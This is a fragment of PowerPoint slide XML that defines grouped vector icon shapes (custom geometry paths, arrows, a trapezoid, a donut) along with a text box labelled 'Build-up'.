              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3985089" h="3350285">
                  <a:moveTo>
                    <a:pt x="1489879" y="1687056"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1413602" y="1687056"/>
                    <a:pt x="1351768" y="1748890"/>
                    <a:pt x="1351768" y="1825167"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1351768" y="1828965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351768" y="1905242"/>
                    <a:pt x="1413602" y="1967076"/>
                    <a:pt x="1489879" y="1967076"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1717713" y="1967076"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1793990" y="1967076"/>
                    <a:pt x="1855824" y="1905242"/>
                    <a:pt x="1855824" y="1828965"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1855824" y="1825167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1855824" y="1748890"/>
                    <a:pt x="1793990" y="1687056"/>
                    <a:pt x="1717713" y="1687056"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2281462" y="1675141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2205185" y="1675141"/>
                    <a:pt x="2143351" y="1736975"/>
                    <a:pt x="2143351" y="1813252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143351" y="1817050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2143351" y="1893327"/>
                    <a:pt x="2205185" y="1955161"/>
                    <a:pt x="2281462" y="1955161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2509296" y="1955161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2585573" y="1955161"/>
                    <a:pt x="2647407" y="1893327"/>
                    <a:pt x="2647407" y="1817050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2647407" y="1813252"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="1736975"/>
                    <a:pt x="2585573" y="1675141"/>
                    <a:pt x="2509296" y="1675141"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="1159396"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="1159396"/>
                    <a:pt x="2645713" y="1245278"/>
                    <a:pt x="2645713" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="1457158"/>
                    <a:pt x="2731595" y="1543040"/>
                    <a:pt x="2837535" y="1543040"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="1543040"/>
                    <a:pt x="3029357" y="1457158"/>
                    <a:pt x="3029357" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="1245278"/>
                    <a:pt x="2943475" y="1159396"/>
                    <a:pt x="2837535" y="1159396"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3235655" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3129715" y="750352"/>
                    <a:pt x="3043833" y="836234"/>
                    <a:pt x="3043833" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3043833" y="1048114"/>
                    <a:pt x="3129715" y="1133996"/>
                    <a:pt x="3235655" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3341595" y="1133996"/>
                    <a:pt x="3427477" y="1048114"/>
                    <a:pt x="3427477" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3427477" y="836234"/>
                    <a:pt x="3341595" y="750352"/>
                    <a:pt x="3235655" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2455585" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2349645" y="750352"/>
                    <a:pt x="2263763" y="836234"/>
                    <a:pt x="2263763" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2263763" y="1048114"/>
                    <a:pt x="2349645" y="1133996"/>
                    <a:pt x="2455585" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2561525" y="1133996"/>
                    <a:pt x="2647407" y="1048114"/>
                    <a:pt x="2647407" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="836234"/>
                    <a:pt x="2561525" y="750352"/>
                    <a:pt x="2455585" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="941776" y="640989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="640989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="881020"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1061785" y="459017"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="762440" y="459017"/>
                    <a:pt x="519773" y="701684"/>
                    <a:pt x="519773" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519773" y="1300374"/>
                    <a:pt x="762440" y="1543041"/>
                    <a:pt x="1061785" y="1543041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1361130" y="1543041"/>
                    <a:pt x="1603797" y="1300374"/>
                    <a:pt x="1603797" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1603797" y="701684"/>
                    <a:pt x="1361130" y="459017"/>
                    <a:pt x="1061785" y="459017"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="359296"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="359296"/>
                    <a:pt x="2645713" y="445178"/>
                    <a:pt x="2645713" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="657058"/>
                    <a:pt x="2731595" y="742940"/>
                    <a:pt x="2837535" y="742940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="742940"/>
                    <a:pt x="3029357" y="657058"/>
                    <a:pt x="3029357" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="445178"/>
                    <a:pt x="2943475" y="359296"/>
                    <a:pt x="2837535" y="359296"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="927799" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2978398" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3447374" y="0"/>
                    <a:pt x="3902811" y="418280"/>
                    <a:pt x="3926614" y="887256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4011721" y="1784310"/>
                    <a:pt x="4065643" y="3326870"/>
                    <a:pt x="3630620" y="3349891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3101375" y="3362701"/>
                    <a:pt x="2778421" y="2566209"/>
                    <a:pt x="2352321" y="2174369"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1572952" y="2174369"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1161652" y="2566210"/>
                    <a:pt x="901104" y="3370635"/>
                    <a:pt x="339051" y="3349892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-171518" y="3349299"/>
                    <a:pt x="45251" y="1463012"/>
                    <a:pt x="48163" y="849156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48163" y="380180"/>
                    <a:pt x="458823" y="0"/>
                    <a:pt x="927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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87D4543-E180-4DF6-A62E-340B16086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95" y="3961380"/>
              <a:ext cx="348693" cy="269437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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E01154-688D-4F5A-ACE4-7E1F6AF2E45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6822" y="3332187"/>
              <a:ext cx="299221" cy="322665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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083C078B-CB36-4448-B100-8BECDC326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6432" y="2099615"/>
              <a:ext cx="296548" cy="296548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8508A6-2707-40ED-98D7-03C1932691B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08791" y="4297323"/>
              <a:ext cx="336694" cy="323742"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3948393" h="3817544">
                  <a:moveTo>
                    <a:pt x="1888045" y="2370407"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1180379" y="2998560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695350" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703301" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1888044" y="3817544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1885393" y="3356368"/>
                    <a:pt x="1874793" y="2911096"/>
                    <a:pt x="1888045" y="2370407"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2059390" y="2370407"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2072642" y="2911096"/>
                    <a:pt x="2062042" y="3356368"/>
                    <a:pt x="2059391" y="3817544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3244134" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3252085" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2767056" y="2998560"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="733907" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2113471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170450" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1919327" y="2170968"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3206900" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2021479" y="2170968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770356" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3940806" y="2113471"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1195981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10560" y="719101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759438" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929887" y="661605"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2762973" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2029067" y="661605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3199516" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948393" y="719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9ED16-E476-4E17-A34C-B1B46D12815D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8705632" y="4148811"/>
            <a:ext cx="164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Build-up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275C19-BA54-4650-B131-3F27D4E65004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8045579" y="2409380"/>
            <a:ext cx="2811142" cy="2844985"/>
            <a:chOff x="8045579" y="2409380"/>
            <a:chExt cx="2811142" cy="2844985"/>
          </a:xfrm>
        </p:grpSpPr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D5FFF734-6862-424E-A388-EF245D0D57E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10509374" y="3444941"/>
              <a:ext cx="343339" cy="343339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39952090-A2AE-4DA8-A3DA-62986F260D10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8174482" y="417483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C9A03E33-5D13-4BFE-9600-571F01E84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5535" y="2409380"/>
              <a:ext cx="393582" cy="392828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Trapezoid 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD1CF70-6406-4C32-BF96-0C20604B317A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10073915" y="2714730"/>
              <a:ext cx="351357" cy="423598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Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5905C8AA-7159-4608-899A-6C22426D61BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3600000">
              <a:off x="8507130" y="4424299"/>
              <a:ext cx="162074" cy="478539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1327763" h="3920353">
                  <a:moveTo>
                    <a:pt x="483881" y="2840232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="843881" y="2840232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843881" y="3920353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483881" y="3920353"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="757697" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="757697" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="432932" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="432932" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605297" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605297" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168643" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318300" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1127664" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200100" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9464" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168643" y="539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3" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DFCD4A-250D-4565-B9BF-3EB2727DF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579" y="3848133"/>
              <a:ext cx="330939" cy="260933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Donut 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077F0151-42C6-4168-9205-DCA71719D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511" y="4923426"/>
              <a:ext cx="304410" cy="330939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225AE540-4E33-4C43-BCFF-ACE56AD8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8127" y="4821478"/>
              <a:ext cx="257012" cy="330939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Rounded Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08C69BE-22CC-4031-8AD6-A8B0C2C8A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7386" y="3842640"/>
              <a:ext cx="309335" cy="30930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117745" y="2289258"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2253931" y="2373161"/>
                    <a:pt x="2290104" y="2397532"/>
                    <a:pt x="2392952" y="2510010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2551302" y="2699530"/>
                    <a:pt x="2456894" y="2911213"/>
                    <a:pt x="2285214" y="2987744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046443" y="3084914"/>
                    <a:pt x="1864058" y="3073352"/>
                    <a:pt x="1634211" y="2962065"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1390134" y="2803501"/>
                    <a:pt x="1391670" y="2463226"/>
                    <a:pt x="1703848" y="2355742"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1867216" y="2309770"/>
                    <a:pt x="1932946" y="2304275"/>
                    <a:pt x="2117745" y="2289258"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1895201" y="880902"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2049819" y="878570"/>
                    <a:pt x="2210983" y="1023567"/>
                    <a:pt x="2276065" y="1236504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2350446" y="1479859"/>
                    <a:pt x="2271166" y="1719799"/>
                    <a:pt x="2098990" y="1772423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1926813" y="1825048"/>
                    <a:pt x="1726940" y="1670429"/>
                    <a:pt x="1652559" y="1427074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1578180" y="1183717"/>
                    <a:pt x="1657458" y="943778"/>
                    <a:pt x="1829635" y="891153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2577034" y="759541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1972441" y="767241"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1929619" y="768623"/>
                    <a:pt x="1886068" y="773785"/>
                    <a:pt x="1842289" y="783004"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1492048" y="856758"/>
                    <a:pt x="1259862" y="1162246"/>
                    <a:pt x="1323686" y="1465331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1380617" y="1735681"/>
                    <a:pt x="1653838" y="1912801"/>
                    <a:pt x="1960688" y="1894227"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1954787" y="1896039"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1858317" y="2000800"/>
                    <a:pt x="1978682" y="2148499"/>
                    <a:pt x="2028445" y="2210716"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1914361" y="2213518"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1373805" y="2249742"/>
                    <a:pt x="1143478" y="2466102"/>
                    <a:pt x="1177422" y="2809298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1211366" y="3152493"/>
                    <a:pt x="1741992" y="3244646"/>
                    <a:pt x="2060873" y="3229704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2379755" y="3214763"/>
                    <a:pt x="2698110" y="2930571"/>
                    <a:pt x="2719230" y="2648210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2699867" y="2070575"/>
                    <a:pt x="2052418" y="2112562"/>
                    <a:pt x="2282832" y="1799863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2510843" y="1673695"/>
                    <a:pt x="2641919" y="1435236"/>
                    <a:pt x="2592014" y="1198247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2566015" y="1074781"/>
                    <a:pt x="2494906" y="970760"/>
                    <a:pt x="2395028" y="897200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2564389" y="891152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2644558" y="859402"/>
                    <a:pt x="2739013" y="796695"/>
                    <a:pt x="2769176" y="767327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2755484" y="761968"/>
                    <a:pt x="2680847" y="759625"/>
                    <a:pt x="2577034" y="759541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Down Arrow 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1349248-BC3E-4DCD-9051-D2CF537FC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733" y="3025716"/>
              <a:ext cx="257188" cy="377708"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2745756" h="4032448">
                  <a:moveTo>
                    <a:pt x="1622229" y="1008112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="1008112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2745756" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996738" y="4032448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247720" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622229" y="3081405"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="749018" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1498036" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123527" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="3024336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374509" y="951043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9510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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE07520C-E6FE-4F09-A947-EA6F68046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8297" y="5013963"/>
              <a:ext cx="300437" cy="20934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3A5724F3-C522-4B0D-93EE-ECF44EBFB9F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="678773">
              <a:off x="10108027" y="4569149"/>
              <a:ext cx="338104" cy="343148"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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62894 h 3939732"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1381594 h 3939732"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2033280 h 3939732"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2631017 h 3939732"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 1997628 h 3939732"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1825498 h 3939732"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1362894 h 3939732"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1508593 h 3939732"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2416710 h 3939732"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2417653 h 3939732"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2822329 h 3939732"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2836256 h 3939732"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2835026 h 3939732"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2827425 h 3939732"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2555951 h 3939732"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2549477 h 3939732"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3084844 h 3939732"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2011053 h 3939732"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 959078 h 3939732"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 937262 h 3939732"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1165194 h 3939732"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 869152 h 3939732"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 794408 h 3939732"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2090795 h 3939732"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2032862 h 3939732"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1337965 h 3939732"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1338068 h 3939732"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 566301 h 3939732"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2265435 h 3939732"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3399556 h 3939732"/>
